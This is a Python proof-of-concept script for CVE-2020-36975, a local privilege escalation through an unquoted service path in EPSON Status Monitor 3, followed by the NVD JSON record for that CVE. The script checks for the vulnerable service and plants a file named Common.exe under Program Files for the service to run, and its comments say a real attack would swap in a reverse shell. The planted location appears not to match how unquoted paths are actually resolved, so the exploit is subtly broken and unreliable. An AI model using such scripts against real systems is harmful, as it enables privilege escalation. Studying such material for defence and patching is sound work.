CVE-2020-36975

#!/usr/bin/env python3 """ CVE-2020-36975 PoC - EPSON Status Monitor 3 Unquoted Service Path This PoC demonstrates the unquoted service path vulnerability in EPSON Status Monitor 3. Note: This is for educational and authorized testing purposes only. """ import os import sys import subprocess import ctypes def check_vulnerability(): """Check if the vulnerable service exists on the system.""" vulnerable_path = r'C:\Program Files\Common Files\EPSON\EPW!3SSRP\E_S60RPB.EXE' # Check if the service exists try: result = subprocess.run( ['sc', 'query', 'EpsonRPCService'], capture_output=True, text=True ) if 'FAILED' in result.stdout or 'FAILED' in result.stderr: print("[-] Target service not found on this system.") return False except Exception as e: print(f"[-] Error checking service: {e}") return False # Check if the vulnerable path exists if os.path.exists(os.path.dirname(vulnerable_path)): print(f"[+] Vulnerable service path directory exists: {os.path.dirname(vulnerable_path)}") return True return False def create_artifact_payload(payload_path): """ Create a malicious executable at the unquoted path location. In a real attack, this would be a reverse shell or other malicious code. """ # The unquoted path allows execution of 'Common.exe' before 'E_S60RPB.EXE' malicious_path = r'C:\Program Files\Common Files\EPSON\Common.exe' try: # Create a benign file for demonstration (in real attack, this would be malicious) with open(malicious_path, 'w') as f: f.write("This would be malicious code in a real attack scenario.") print(f"[+] Payload artifact created at: {malicious_path}") print("[+] When the service restarts, it may execute this file instead of the legitimate binary.") return True except PermissionError: print("[-] Insufficient privileges to create file at the vulnerable path.") print("[-] This attack requires administrative privileges or specific file system permissions.") return False except Exception as e: print(f"[-] Error creating payload: {e}") return False def main(): print("=" * 60) print("CVE-2020-36975 PoC - EPSON Status Monitor 3 Unquoted Service Path") print("=" * 60) if not ctypes.windll.shell32.IsUserAnAdmin(): print("[-] Warning: This PoC should be run with administrator privileges.") if check_vulnerability(): print("[+] System appears to be vulnerable to CVE-2020-36975") create_artifact_payload(None) else: print("[-] System does not appear to be vulnerable or target service not found.") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2020-36975", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:10.083", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EPSON Status Monitor 3 version 8.0 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code by exploiting the service binary path. Attackers can leverage the unquoted path in 'C:\\Program Files\\Common Files\\EPSON\\EPW!3SSRP\\E_S60RPB.EXE' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "EPSON Status Monitor 3 versión 8.0 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar potencialmente código arbitrario explotando la ruta del binario del servicio. Los atacantes pueden aprovechar la ruta sin comillas en 'C:\\Program Files\\Common Files\\EPSON\\EPW!3SSRP\\E_S60RPB.EXE' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://epson.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49141", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/epson-status-monitor-epsonpmrpcv-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49141", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}